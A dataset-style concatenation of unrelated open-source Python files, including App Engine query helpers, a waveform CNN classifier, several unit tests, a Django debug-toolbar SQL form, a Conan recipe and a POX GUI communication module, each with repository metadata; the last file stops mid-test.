1f0401165f4e5b67b9a06bbdbeb2fc612d6b8e8e
|
[
"Apache-2.0"
] | 264
|
2015-01-07T18:48:55.000Z
|
2022-02-07T15:09:59.000Z
|
python/openradar/db.py
|
manicmaniac/openradar
|
1f0401165f4e5b67b9a06bbdbeb2fc612d6b8e8e
|
[
"Apache-2.0"
] | 32
|
2015-01-12T08:39:16.000Z
|
2022-03-26T10:30:08.000Z
|
python/openradar/db.py
|
manicmaniac/openradar
|
1f0401165f4e5b67b9a06bbdbeb2fc612d6b8e8e
|
[
"Apache-2.0"
] | 28
|
2015-04-07T05:26:08.000Z
|
2022-02-22T09:14:54.000Z
|
"""@package docstring
Provides database access for models.
"""
import models
class Radar():
    """Query helpers for models.Radar (App Engine datastore via GQL).

    page is 1-based; count is the page size.
    """
    def fetchAll(self, page = 1, count = 100):
        # Newest radars (highest number) first.
        return models.Radar.gql("ORDER BY number DESC").fetch(count, offset=(page - 1) * count)
    def fetchCount(self):
        # NOTE(review): count() is capped at 100000 entities.
        return models.Radar.all().count(limit=100000)
    def fetchById(self, id):
        return models.Radar.get_by_id(id)
    def fetchByNumber(self, number):
        # Returns a single entity or None.
        return models.Radar.gql("WHERE number = :1", number).get()
    def fetchByNumbers(self, numbers, page = 1, count = 100):
        return models.Radar.gql("WHERE number IN :1", numbers).fetch(count, offset=(page - 1) * count)
    def fetchByUser(self, user, page = 1, count = 100):
        return models.Radar.gql("WHERE user = :1 ORDER BY number DESC", user).fetch(count, offset=(page - 1) * count)
    def fetchByUsers(self, users, page = 1, count = 100):
        return models.Radar.gql("WHERE user IN :1 ORDER BY number DESC", users).fetch(count, offset=(page - 1) * count)
class Comment():
    """Query helpers for models.Comment (App Engine datastore via GQL)."""
    def fetchAll(self, page = 1, count = 100):
        # Newest comments first; page is 1-based.
        return models.Comment.gql("ORDER BY posted_at DESC").fetch(count, offset=(page - 1) * count)
    def fetchCount(self):
        # NOTE(review): count() is capped at 100000 entities.
        return models.Comment.all().count(limit=100000)
    def fetchByUser(self, user, page = 1, count = 100):
        return models.Comment.gql("WHERE user = :1 ORDER BY posted_at DESC", user).fetch(count, offset=(page - 1) * count)
class APIKey():
    """Query helpers for models.APIKey; each returns one entity or None."""
    def fetchByUser(self, user):
        return models.APIKey.gql("WHERE user = :1", user).get()
    def fetchByAPIKey(self, apikey):
        return models.APIKey.gql("WHERE apikey = :1", apikey).get()
| 38.021739
| 122
| 0.618639
|
4a04e970484b8ed63ccfd49457e0826cf71042da
| 3,182
|
py
|
Python
|
code/model_classifier.py
|
acids-ircam/lottery_mir
|
1440d717d7fd688ac43c1a406602aaf2d5a3842d
|
[
"MIT"
] | 10
|
2020-07-29T23:12:15.000Z
|
2022-03-23T16:27:43.000Z
|
code/model_classifier.py
|
acids-ircam/lottery_mir
|
1440d717d7fd688ac43c1a406602aaf2d5a3842d
|
[
"MIT"
] | null | null | null |
code/model_classifier.py
|
acids-ircam/lottery_mir
|
1440d717d7fd688ac43c1a406602aaf2d5a3842d
|
[
"MIT"
] | 1
|
2022-02-06T11:42:28.000Z
|
2022-02-06T11:42:28.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 23 17:41:02 2020
@author: esling
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
from model import LotteryClassification
"""
Here we define a dilated 1d-CNN model for general purpose waveform classification
This model will serve for both the tasks of
- Instrument recongition
- Singing mode classification
"""
# Global variables
instruments = ['bn','cl','db','fl','hn','ob','sax','tba','tbn','tpt','va','vc','vn']
class WaveformCNN(nn.Module):
    """Dilated 1-D CNN followed by an MLP head for waveform classification.

    Expected attributes on args: input_size, output_size, n_hidden, n_layers,
    channels, kernel, dilation. dilation == 3 is a sentinel selecting an
    exponentially growing dilation (2 ** layer); any other value is used as a
    fixed dilation factor.
    """

    def __init__(self, args):
        super(WaveformCNN, self).__init__()
        in_size = np.prod(args.input_size)
        out_size = np.prod(args.output_size)
        hidden_size = args.n_hidden
        n_layers = args.n_layers
        channels = args.channels
        # The MLP head mirrors the depth of the convolutional stack.
        n_mlp = args.n_layers
        modules = nn.Sequential()
        self.in_size = in_size
        size = in_size
        in_channel = 1
        kernel = args.kernel
        stride = kernel // 16
        # Convolutional stack. Module names ('c2%i', ...) are kept identical to
        # the original so existing state_dicts keep loading.
        for layer in range(n_layers):
            # Fix: replaced the `cond and a or b` anti-pattern with conditional
            # expressions (same values for all inputs used here).
            dil = 2 ** layer if args.dilation == 3 else args.dilation
            pad = 3 * (dil + 1)
            in_s = in_channel if layer == 0 else channels
            out_s = 1 if layer == n_layers - 1 else channels
            modules.add_module('c2%i' % layer, nn.Conv1d(in_s, out_s, kernel, stride, pad, dilation=dil))
            if layer < n_layers - 1:
                modules.add_module('b2%i' % layer, nn.BatchNorm1d(out_s))
                modules.add_module('a2%i' % layer, nn.ReLU())
                modules.add_module('d2%i' % layer, nn.Dropout2d(p=.25))
            # Standard 1-D convolution output-length formula.
            size = int((size + 2 * pad - (dil * (kernel - 1) + 1)) / stride + 1)
        # The last conv layer must survive lottery-ticket pruning.
        modules[-1].unprunable = True
        self.net = modules
        self.mlp = nn.Sequential()
        # MLP head mapping the flattened conv output to class logits.
        for layer in range(n_mlp):
            in_s = size if layer == 0 else hidden_size
            out_s = out_size if layer == n_mlp - 1 else hidden_size
            self.mlp.add_module('h%i' % layer, nn.Linear(in_s, out_s))
            # Fix: compare against n_mlp (the original compared n_layers); the
            # two are equal today, so behavior is unchanged, but the head now
            # stays correct if the depths ever diverge.
            if layer < n_mlp - 1:
                self.mlp.add_module('b%i' % layer, nn.BatchNorm1d(out_s))
                self.mlp.add_module('a%i' % layer, nn.ReLU())
                self.mlp.add_module('d%i' % layer, nn.Dropout(p=.25))
        self.mlp[-1].unprunable = True
        self.cnn_size = size

    def init_parameters(self):
        """ Initialize internal parameters (sub-modules) uniformly in [-0.01, 0.01]. """
        for param in self.parameters():
            param.data.uniform_(-0.01, 0.01)

    def forward(self, x):
        """Run the conv stack then the MLP head; returns (batch, out_size) logits."""
        x = x.view(-1, 1, self.in_size)
        out = x
        for m in range(len(self.net)):
            out = self.net[m](out)
        out = out.view(x.shape[0], -1)
        for m in range(len(self.mlp)):
            out = self.mlp[m](out)
        return out
"""
Model bottle inheritance
"""
class LotteryClassifierCNN(LotteryClassification, WaveformCNN):
    """Combines the lottery-ticket classification wrapper with the waveform CNN."""
    def __init__(self, args):
        super(LotteryClassifierCNN, self).__init__(args)
        WaveformCNN.__init__(self, args)
        # Pruning configuration consumed by the lottery-ticket machinery.
        self.pruning = args.pruning
| 31.82
| 101
| 0.570082
|
4a04ea3a06ccd927cca5332fdc78ad899cae524a
| 8,060
|
py
|
Python
|
metatests/cloudcafe/bare_metal/drivers/models/test_driver_responses.py
|
rcbops-qa/cloudcafe
|
d937f85496aadafbb94a330b9adb8ea18bee79ba
|
[
"Apache-2.0"
] | null | null | null |
metatests/cloudcafe/bare_metal/drivers/models/test_driver_responses.py
|
rcbops-qa/cloudcafe
|
d937f85496aadafbb94a330b9adb8ea18bee79ba
|
[
"Apache-2.0"
] | null | null | null |
metatests/cloudcafe/bare_metal/drivers/models/test_driver_responses.py
|
rcbops-qa/cloudcafe
|
d937f85496aadafbb94a330b9adb8ea18bee79ba
|
[
"Apache-2.0"
] | 1
|
2020-04-13T17:44:28.000Z
|
2020-04-13T17:44:28.000Z
|
"""
Copyright 2014 Rackspace
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
from cloudcafe.bare_metal.drivers.models.responses import Driver, Drivers
class DriversModelTest(unittest.TestCase):
    """Deserialization checks for a bare-metal Drivers list response."""

    @classmethod
    def setUpClass(cls):
        # NOTE(review): the first driver's hrefs say 'ipminative' (sic) while
        # its name is 'fake_ipminative'; preserved as in the original fixture.
        cls.drivers_json_response = \
            """
            {
               "drivers":[
                  {
                     "hosts":[
                        "localhost"
                     ],
                     "name":"fake_ipminative",
                     "links":[
                        {
                           "href":"http://local:6385/v1/drivers/ipminative",
                           "rel":"self"
                        },
                        {
                           "href":"http://local:6385/drivers/ipminative",
                           "rel":"bookmark"
                        }
                     ]
                  },
                  {
                     "hosts":[
                        "localhost"
                     ],
                     "name":"p_ipminative",
                     "links":[
                        {
                           "href":"http://local:6385/v1/drivers/p_ipminative",
                           "rel":"self"
                        },
                        {
                           "href":"http://local:6385/drivers/p_ipminative",
                           "rel":"bookmark"
                        }
                     ]
                  },
                  {
                     "hosts":[
                        "localhost"
                     ],
                     "name":"fake_pxe",
                     "links":[
                        {
                           "href":"http://local:6385/v1/drivers/fake_pxe",
                           "rel":"self"
                        },
                        {
                           "href":"http://local:6385/drivers/fake_pxe",
                           "rel":"bookmark"
                        }
                     ]
                  },
                  {
                     "hosts":[
                        "localhost"
                     ],
                     "name":"fake_ssh",
                     "links":[
                        {
                           "href":"http://local:6385/v1/drivers/fake_ssh",
                           "rel":"self"
                        },
                        {
                           "href":"http://local:6385/drivers/fake_ssh",
                           "rel":"bookmark"
                        }
                     ]
                  },
                  {
                     "hosts":[
                        "localhost"
                     ],
                     "name":"fake_ipmitool",
                     "links":[
                        {
                           "href":"http://local:6385/v1/drivers/fake_ipmitool",
                           "rel":"self"
                        },
                        {
                           "href":"http://local:6385/drivers/fake_ipmitool",
                           "rel":"bookmark"
                        }
                     ]
                  },
                  {
                     "hosts":[
                        "localhost"
                     ],
                     "name":"fake",
                     "links":[
                        {
                           "href":"http://local:6385/v1/drivers/fake",
                           "rel":"self"
                        },
                        {
                           "href":"http://local:6385/drivers/fake",
                           "rel":"bookmark"
                        }
                     ]
                  },
                  {
                     "hosts":[
                        "localhost"
                     ],
                     "name":"pxe_ssh",
                     "links":[
                        {
                           "href":"http://local:6385/v1/drivers/pxe_ssh",
                           "rel":"self"
                        },
                        {
                           "href":"http://local:6385/drivers/pxe_ssh",
                           "rel":"bookmark"
                        }
                     ]
                  },
                  {
                     "hosts":[
                        "localhost"
                     ],
                     "name":"pxe_ipmitool",
                     "links":[
                        {
                           "href":"http://local:6385/v1/drivers/pxe_ipmitool",
                           "rel":"self"
                        },
                        {
                           "href":"http://local:6385/drivers/pxe_ipmitool",
                           "rel":"bookmark"
                        }
                     ]
                  }
               ]
            }
            """
        cls.drivers = Drivers.deserialize(cls.drivers_json_response, 'json')

    def test_list_drivers(self):
        """The canned response deserializes into exactly eight drivers."""
        self.assertEqual(len(self.drivers), 8)

    def test_drivers_in_list(self):
        """Every expected driver name appears in the deserialized list.

        Fix: replaces eight copy-pasted assertTrue(any([...])) blocks, each of
        which materialized a throwaway list, with one set-based loop.
        """
        expected_names = {
            'fake_ipminative', 'p_ipminative', 'fake_pxe', 'fake_ssh',
            'fake_ipmitool', 'fake', 'pxe_ssh', 'pxe_ipmitool',
        }
        found_names = {driver.name for driver in self.drivers}
        # One assertion per name keeps failure messages specific.
        for name in sorted(expected_names):
            self.assertIn(name, found_names)
class DriverModelTest(unittest.TestCase):
    """Deserialization checks for a single Driver response."""

    @classmethod
    def setUpClass(cls):
        cls.driver_json_response = \
            """
            {
               "hosts":[
                  "localhost"
               ],
               "name":"fake",
               "links":[
                  {
                     "href":"http://192.168.159.128:6385/v1/drivers/fake",
                     "rel":"self"
                  },
                  {
                     "href":"http://192.168.159.128:6385/drivers/fake",
                     "rel":"bookmark"
                  }
               ]
            }
            """
        cls.driver = Driver.deserialize(cls.driver_json_response, 'json')

    def test_driver_name(self):
        self.assertEqual(self.driver.name, "fake")

    def test_driver_hosts(self):
        hosts = self.driver.hosts
        self.assertEqual(len(hosts), 1)
        self.assertIn('localhost', hosts)

    def test_driver_links(self):
        # Each link's href must match the expectation for its rel type.
        expected_hrefs = {
            'self': 'http://192.168.159.128:6385/v1/drivers/fake',
            'bookmark': 'http://192.168.159.128:6385/drivers/fake',
        }
        self.assertEqual(len(self.driver.links), 2)
        for link in self.driver.links:
            self.assertIn(link.rel, expected_hrefs)
            self.assertEqual(link.href, expected_hrefs[link.rel])
| 33.723849
| 79
| 0.359553
|
4a04eb9ca1a884fccbff255822fd042d715eccdd
| 396
|
py
|
Python
|
tests/test_field.py
|
samarjeet27/CSV-Mapper
|
90946a138b5690623ef1e2ada42b32c9f3e52b16
|
[
"MIT"
] | 18
|
2015-01-21T15:03:21.000Z
|
2017-05-09T10:15:46.000Z
|
tests/test_field.py
|
samarsault/CSV-Mapper
|
90946a138b5690623ef1e2ada42b32c9f3e52b16
|
[
"MIT"
] | 8
|
2015-03-14T14:22:26.000Z
|
2017-06-04T11:45:05.000Z
|
tests/test_field.py
|
samarsault/CSV-Mapper
|
90946a138b5690623ef1e2ada42b32c9f3e52b16
|
[
"MIT"
] | 8
|
2015-01-21T15:03:22.000Z
|
2017-05-18T06:31:21.000Z
|
import unittest
import csvmapper
class FieldTest(unittest.TestCase):
    """Checks that FieldMapper maps CSV columns onto named dict keys."""
    def setUp(self):
        # Map the four columns of the sample CSV onto field names, in order.
        parser = csvmapper.CSVParser('tests/data/sampleData.csv', csvmapper.FieldMapper(('name', 'job','country','age')))
        self.obj = parser.buildDict()
    def test_attr(self):
        # Values come back as strings; row order is preserved.
        self.assertEqual(self.obj[0]['name'], 'John')
        self.assertEqual(self.obj[1]['age'], '32')
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
| 28.285714
| 115
| 0.709596
|
4a04ecc0ea5491e30189c25e7bc6d7bea4cb874b
| 41
|
py
|
Python
|
tests/__init__.py
|
swallat/safe_reboot
|
f950deb429f38e0e80d8f884afc06f2d7201e023
|
[
"Apache-2.0"
] | null | null | null |
tests/__init__.py
|
swallat/safe_reboot
|
f950deb429f38e0e80d8f884afc06f2d7201e023
|
[
"Apache-2.0"
] | null | null | null |
tests/__init__.py
|
swallat/safe_reboot
|
f950deb429f38e0e80d8f884afc06f2d7201e023
|
[
"Apache-2.0"
] | null | null | null |
"""Unit test package for safe_reboot."""
| 20.5
| 40
| 0.707317
|
4a04ee2c1a8b91e1f93c84c850d971f3b870dc19
| 74
|
py
|
Python
|
main.py
|
FranckEnriquez/pythonProject
|
28e7612ed19e5a9a124a7cfefadf6b8db5e84d12
|
[
"MIT"
] | null | null | null |
main.py
|
FranckEnriquez/pythonProject
|
28e7612ed19e5a9a124a7cfefadf6b8db5e84d12
|
[
"MIT"
] | null | null | null |
main.py
|
FranckEnriquez/pythonProject
|
28e7612ed19e5a9a124a7cfefadf6b8db5e84d12
|
[
"MIT"
] | null | null | null |
'''
main.py: gather the principal components of each project section.
'''
| 24.666667
| 66
| 0.743243
|
4a04ee67b3640917360632de75e33771c4b16186
| 2,664
|
py
|
Python
|
djangox/lib/python3.8/site-packages/debug_toolbar/panels/sql/forms.py
|
DemarcusL/django_wiki_lab
|
3b7cf18af7e0f89c94d10eb953ca018a150a2f55
|
[
"MIT"
] | 1
|
2020-10-19T12:35:10.000Z
|
2020-10-19T12:35:10.000Z
|
djangox/lib/python3.8/site-packages/debug_toolbar/panels/sql/forms.py
|
DemarcusL/django_wiki_lab
|
3b7cf18af7e0f89c94d10eb953ca018a150a2f55
|
[
"MIT"
] | 6
|
2021-04-08T20:09:57.000Z
|
2022-03-12T00:49:24.000Z
|
djangox/lib/python3.8/site-packages/debug_toolbar/panels/sql/forms.py
|
DemarcusL/django_wiki_lab
|
3b7cf18af7e0f89c94d10eb953ca018a150a2f55
|
[
"MIT"
] | 3
|
2020-10-07T20:19:52.000Z
|
2020-11-09T14:42:55.000Z
|
import hashlib
import hmac
import json
from django import forms
from django.conf import settings
from django.core.exceptions import ValidationError
from django.db import connections
from django.utils.crypto import constant_time_compare
from django.utils.encoding import force_bytes
from django.utils.functional import cached_property
from debug_toolbar.panels.sql.utils import reformat_sql
class SQLSelectForm(forms.Form):
"""
Validate params
sql: The sql statement with interpolated params
raw_sql: The sql statement with placeholders
params: JSON encoded parameter values
duration: time for SQL to execute passed in from toolbar just for redisplay
hash: the hash of (secret + sql + params) for tamper checking
"""
sql = forms.CharField()
raw_sql = forms.CharField()
params = forms.CharField()
alias = forms.CharField(required=False, initial="default")
duration = forms.FloatField()
hash = forms.CharField()
def __init__(self, *args, **kwargs):
initial = kwargs.get("initial")
if initial is not None:
initial["hash"] = self.make_hash(initial)
super().__init__(*args, **kwargs)
for name in self.fields:
self.fields[name].widget = forms.HiddenInput()
def clean_raw_sql(self):
value = self.cleaned_data["raw_sql"]
if not value.lower().strip().startswith("select"):
raise ValidationError("Only 'select' queries are allowed.")
return value
def clean_params(self):
value = self.cleaned_data["params"]
try:
return json.loads(value)
except ValueError:
raise ValidationError("Is not valid JSON")
def clean_alias(self):
value = self.cleaned_data["alias"]
if value not in connections:
raise ValidationError("Database alias '%s' not found" % value)
return value
def clean_hash(self):
hash = self.cleaned_data["hash"]
if not constant_time_compare(hash, self.make_hash(self.data)):
raise ValidationError("Tamper alert")
return hash
def reformat_sql(self):
return reformat_sql(self.cleaned_data["sql"], with_toggle=False)
def make_hash(self, data):
m = hmac.new(key=force_bytes(settings.SECRET_KEY), digestmod=hashlib.sha1)
for item in [data["sql"], data["params"]]:
m.update(force_bytes(item))
return m.hexdigest()
@property
def connection(self):
return connections[self.cleaned_data["alias"]]
@cached_property
def cursor(self):
return self.connection.cursor()
| 28.956522
| 83
| 0.664039
|
4a04ef8585e59a3d321deebceffd825ab1bbe049
| 547
|
py
|
Python
|
pytglib/api/types/chat_action_recording_voice_note.py
|
iTeam-co/pytglib
|
e5e75e0a85f89b77762209b32a61b0a883c0ae61
|
[
"MIT"
] | 6
|
2019-10-30T08:57:27.000Z
|
2021-02-08T14:17:43.000Z
|
pytglib/api/types/chat_action_recording_voice_note.py
|
iTeam-co/python-telegram
|
e5e75e0a85f89b77762209b32a61b0a883c0ae61
|
[
"MIT"
] | 1
|
2021-08-19T05:44:10.000Z
|
2021-08-19T07:14:56.000Z
|
pytglib/api/types/chat_action_recording_voice_note.py
|
iTeam-co/python-telegram
|
e5e75e0a85f89b77762209b32a61b0a883c0ae61
|
[
"MIT"
] | 5
|
2019-12-04T05:30:39.000Z
|
2021-05-21T18:23:32.000Z
|
from ..utils import Object
class ChatActionRecordingVoiceNote(Object):
"""
The user is recording a voice note
Attributes:
ID (:obj:`str`): ``ChatActionRecordingVoiceNote``
No parameters required.
Returns:
ChatAction
Raises:
:class:`telegram.Error`
"""
ID = "chatActionRecordingVoiceNote"
def __init__(self, **kwargs):
pass
@staticmethod
def read(q: dict, *args) -> "ChatActionRecordingVoiceNote":
return ChatActionRecordingVoiceNote()
| 17.645161
| 63
| 0.621572
|
4a04ef9acaeeb7374c8d9e94079ecf6bcd1ed82a
| 342
|
py
|
Python
|
conanfile.py
|
CloudComputer/libInterpolate
|
75adc603364d19919909a89cfbfd02a1cc502bdb
|
[
"MIT"
] | 1
|
2020-07-17T09:41:17.000Z
|
2020-07-17T09:41:17.000Z
|
conanfile.py
|
CloudComputer/libInterpolate
|
75adc603364d19919909a89cfbfd02a1cc502bdb
|
[
"MIT"
] | null | null | null |
conanfile.py
|
CloudComputer/libInterpolate
|
75adc603364d19919909a89cfbfd02a1cc502bdb
|
[
"MIT"
] | null | null | null |
from conans import ConanFile, CMake, tools
import os
class ConanBuild(ConanFile):
generators = "cmake", "virtualenv"
requires = 'boost/1.69.0@conan/stable', 'eigen/3.3.7@cd3/devel'
build_requires = 'cmake_installer/3.13.0@conan/stable'
def build(self):
cmake = CMake(self)
cmake.configure()
cmake.build()
| 24.428571
| 67
| 0.672515
|
4a04eff2ee2ce87d4181521b1d202b197c7c3a3a
| 556
|
py
|
Python
|
celery/contrib/test_runner.py
|
winhamwr/celery
|
249a270301ddb9b025cf8d00400bb442df9cae62
|
[
"BSD-3-Clause"
] | 1
|
2017-12-26T06:29:37.000Z
|
2017-12-26T06:29:37.000Z
|
celery/contrib/test_runner.py
|
winhamwr/celery
|
249a270301ddb9b025cf8d00400bb442df9cae62
|
[
"BSD-3-Clause"
] | null | null | null |
celery/contrib/test_runner.py
|
winhamwr/celery
|
249a270301ddb9b025cf8d00400bb442df9cae62
|
[
"BSD-3-Clause"
] | null | null | null |
from django.conf import settings
from django.test.simple import run_tests as run_tests_orig
USAGE = """\
Custom test runner to allow testing of celery delayed tasks.
"""
def run_tests(test_labels, *args, **kwargs):
"""Django test runner allowing testing of celery delayed tasks.
All tasks are run locally, not in a worker.
To use this runner set ``settings.TEST_RUNNER``::
TEST_RUNNER = "celery.contrib.test_runner.run_tests"
"""
settings.CELERY_ALWAYS_EAGER = True
return run_tests_orig(test_labels, *args, **kwargs)
| 27.8
| 67
| 0.726619
|
4a04f005c7d5f65452467a1f08104f5cebb9f8df
| 1,763
|
py
|
Python
|
tests/smartdatamodels/poi/test_poi.py
|
Orange-OpenSource/python-ngsild-client
|
23ff31506aabd23c75befece1fb3d4536903cb2a
|
[
"Apache-2.0"
] | 7
|
2022-02-25T09:55:28.000Z
|
2022-03-25T20:48:01.000Z
|
tests/smartdatamodels/poi/test_poi.py
|
Orange-OpenSource/python-ngsild-client
|
23ff31506aabd23c75befece1fb3d4536903cb2a
|
[
"Apache-2.0"
] | null | null | null |
tests/smartdatamodels/poi/test_poi.py
|
Orange-OpenSource/python-ngsild-client
|
23ff31506aabd23c75befece1fb3d4536903cb2a
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# Software Name: ngsildclient
# SPDX-FileCopyrightText: Copyright (c) 2021 Orange
# SPDX-License-Identifier: Apache 2.0
#
# This software is distributed under the Apache 2.0;
# see the NOTICE file for more details.
#
# Author: Fabien BATTELLO <fabien.battello@orange.com> et al.
import pkg_resources
import json
from ngsildclient.model.entity import *
from ngsildclient.model.helper.postal import PostalAddressBuilder
def expected_dict(basename: str) -> dict:
filename: str = pkg_resources.resource_filename(__name__, f"data/{basename}.json")
with open(filename, "r") as fp:
expected = json.load(fp)
return expected
def test_poi():
"""
https://smart-data-models.github.io/dataModel.PointOfInterest/PointOfInterest/examples/example-normalized.jsonld
"""
e = Entity(
"PointOfInterest",
"PointOfInterest:PointOfInterest-A-Concha-123456",
ctx=[
"https://smartdatamodels.org/context.jsonld",
"https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld",
],
)
e.prop("name", "Playa de a Concha")
builder = PostalAddressBuilder()
address = builder.country("ES").locality("Vilagarcía de Arousa").build()
e.prop("address", address)
e.prop("category", [113])
e.prop(
"description",
"La Playa de A Concha se presenta como una continuación de la Playa de Compostela, una de las más frecuentadas de Vilagarcía.",
)
e.gprop("location", (42.60214472222222, -8.768460000000001))
e.prop("refSeeAlso", "urn:ngsi-ld:SeeAlso:Beach-A-Concha-123456")
e.prop("source", "http://www.tourspain.es")
assert e.to_dict() == expected_dict("poi")
assert e.to_dict(kv=True) == expected_dict("poi.kv")
| 32.054545
| 135
| 0.684061
|
4a04f2a90dd211dd0550fe3f62ffc632ce9e78e5
| 6,464
|
py
|
Python
|
Internetworking Distributed Project/finalProject/ovs/pox-master/tools/gui/communication.py
|
supriyasingh01/github_basics
|
8aa93f783cfe347368763ef31be5ab59fe8476a1
|
[
"CC0-1.0"
] | null | null | null |
Internetworking Distributed Project/finalProject/ovs/pox-master/tools/gui/communication.py
|
supriyasingh01/github_basics
|
8aa93f783cfe347368763ef31be5ab59fe8476a1
|
[
"CC0-1.0"
] | null | null | null |
Internetworking Distributed Project/finalProject/ovs/pox-master/tools/gui/communication.py
|
supriyasingh01/github_basics
|
8aa93f783cfe347368763ef31be5ab59fe8476a1
|
[
"CC0-1.0"
] | null | null | null |
'''
This module implements the communication between
- the topology view and the monitoring backend that feeds it
- the log view and NOX's logger
- the json command prompt and NOX's json messenger
@author Kyriakos Zarifis
'''
from PyQt4 import QtGui, QtCore
import SocketServer
import socket
import logging
import json
import asyncore
from time import sleep
import cPickle
import struct
# JSON decoder used by default
defaultDecoder = json.JSONDecoder()
class Communication(QtCore.QThread, QtGui.QWidget):
'''
Communicates with backend in order to receive topology-view
information. Used to communicate with GuiMessenger for other, component-
specific event notification too.
'''
# Define signals that are emitted when messages are received
# Interested custom views connect these signals to their slots
# Signal used to notify te view that tunnels have been updated
#tunnels_reply_received_signal = QtCore.pyqtSignal()
# Signal used to notify te view that new TED info was received
#ted_reply_received_signal = QtCore.pyqtSignal()
# Signal used to notify te view that tunnels might have changed
#link_status_change_signal = QtCore.pyqtSignal()
# Define a new signal that takes a SwitchQueryReply type as an argument
#switch_query_reply_received_signal = QtCore.pyqtSignal()# SwitchQueryReply )
# Signal used to notify monitoring view of new msg
monitoring_received_signal = QtCore.pyqtSignal(object)
# Define a new signal that takes a Topology type as an argument
topology_received_signal = QtCore.pyqtSignal(object)
# Signal used to notify STP view of new msg
spanning_tree_received_signal = QtCore.pyqtSignal(object)
# Signal used to notify routing view of new msg
routing_received_signal = QtCore.pyqtSignal(object)
# Signal used to notify FlowTracer view of new msg
flowtracer_received_signal = QtCore.pyqtSignal(object)
# Signal used to notify Log of new msg
log_received_signal = QtCore.pyqtSignal(object)
def __init__(self, parent):
QtCore.QThread.__init__(self)
self.xid_counter = 1
self.parent = parent
self.backend_ip = self.parent.backend_ip
self.backend_port = self.parent.backend_port
# Connect socket
self.connected = False
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#self.sock.setblocking(0)
try:
self.sock.connect((self.backend_ip,self.backend_port))
self.connected = True
except:
self.retry_connection()
#self.subscribe_for_topochanges()
#self.subscribe_for_linkutils()
self.listener = Listener(self)
self.listener.start()
def retry_connection(self):
print "Retrying connection to POX...(is 'messenger' running?)"
sleep(2)
try:
self.sock.connect((self.backend_ip,self.backend_port))
self.connected = True
except:
self.retry_connection()
def send(self, msg):
if not self.connected:
print "Not connected to POX"
return
#if not "xid" in msg:
# msg["xid"] = self.xid_counter
#self.xid_counter += 1
print 'Sending :', msg
self.sock.send(json.dumps(msg))
def shutdown(self):
#self.listener.stop()
self.sock.shutdown(1)
self.sock.close()
class Listener(QtCore.QThread):
def __init__(self, p):
QtCore.QThread.__init__(self)
self.p = p
self._buf = bytes()
def run (self):
while 1:
data = self.p.sock.recv(1024)
if data is None or len(data) == 0:
break
#if len(data) == 0: return
if len(self._buf) == 0:
if data[0].isspace():
self._buf = data.lstrip()
else:
self._buf = data
else:
self._buf += data
while len(self._buf) > 0:
try:
msg, l = defaultDecoder.raw_decode(self._buf)
except:
# Need more data before it's a valid message
# (.. or the stream is corrupt and things will never be okay ever again)
return
self._buf = self._buf[l:]
if len(self._buf) != 0 and self._buf[0].isspace():
self._buf = self._buf.lstrip()
if msg["type"] == "topology":
print "Recieved :", msg
self.p.topology_received_signal.emit(msg)
elif msg["type"] == "monitoring":
self.p.monitoring_received_signal.emit(msg)
elif msg["type"] == "spanning_tree":
self.p.spanning_tree_received_signal.emit(msg)
elif msg["type"] == "sample_routing":
self.p.routing_received_signal.emit(msg)
elif msg["type"] == "flowtracer":
self.p.flowtracer_received_signal.emit(msg)
elif msg["type"] == "log":
self.p.log_received_signal.emit(msg)
class ConsoleInterface():
'''
Sends JSON commands to NOX
'''
def __init__(self, parent):
self.consoleWidget = parent
##NOX host
self.nox_host = "localhost"
##Port number
self.port_no = 2703
def send_cmd(self, cmd=None, expectReply=False):
# if textbox empty, construct command
if not cmd:
print "sending dummy cmd"
cmd = "{\"type\":\"lavi\",\"command\":\"request\",\"node_type\":\"all\"}"
#Send command
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.nox_host,self.port_no))
sock.send(cmd)
if expectReply:
print json.dumps(json.loads(sock.recv(4096)), indent=4)
sock.send("{\"type\":\"disconnect\"}")
sock.shutdown(1)
sock.close()
| 35.322404
| 93
| 0.568843
|
4a04f2ac56134703f643a6aeb3cdc6bc815685d3
| 19,348
|
py
|
Python
|
sdk/cognitivelanguage/azure-ai-language-questionanswering/tests/test_query_text_async.py
|
bpkroth/azure-sdk-for-python
|
a269888e708c10d955b91b4ab421a81a8ccfda5b
|
[
"MIT"
] | null | null | null |
sdk/cognitivelanguage/azure-ai-language-questionanswering/tests/test_query_text_async.py
|
bpkroth/azure-sdk-for-python
|
a269888e708c10d955b91b4ab421a81a8ccfda5b
|
[
"MIT"
] | null | null | null |
sdk/cognitivelanguage/azure-ai-language-questionanswering/tests/test_query_text_async.py
|
bpkroth/azure-sdk-for-python
|
a269888e708c10d955b91b4ab421a81a8ccfda5b
|
[
"MIT"
] | null | null | null |
# coding=utf-8
# ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
from azure.core.exceptions import HttpResponseError, ClientAuthenticationError
from azure.core.credentials import AzureKeyCredential
from testcase import (
QuestionAnsweringTest,
GlobalQuestionAnsweringAccountPreparer
)
from azure.ai.language.questionanswering.aio import QuestionAnsweringClient
from azure.ai.language.questionanswering.rest import *
from azure.ai.language.questionanswering.models import (
TextQueryParameters,
TextInput
)
class QnATests(QuestionAnsweringTest):
def setUp(self):
super(QnATests, self).setUp()
@GlobalQuestionAnsweringAccountPreparer()
async def test_query_text_llc(self, qna_account, qna_key):
client = QuestionAnsweringClient(qna_account, AzureKeyCredential(qna_key))
json_content = {
"question": "What is the meaning of life?",
"records": [
{
"text": "abc Graphics Surprise, surprise -- our 4K ",
"id": "doc1"
},
{
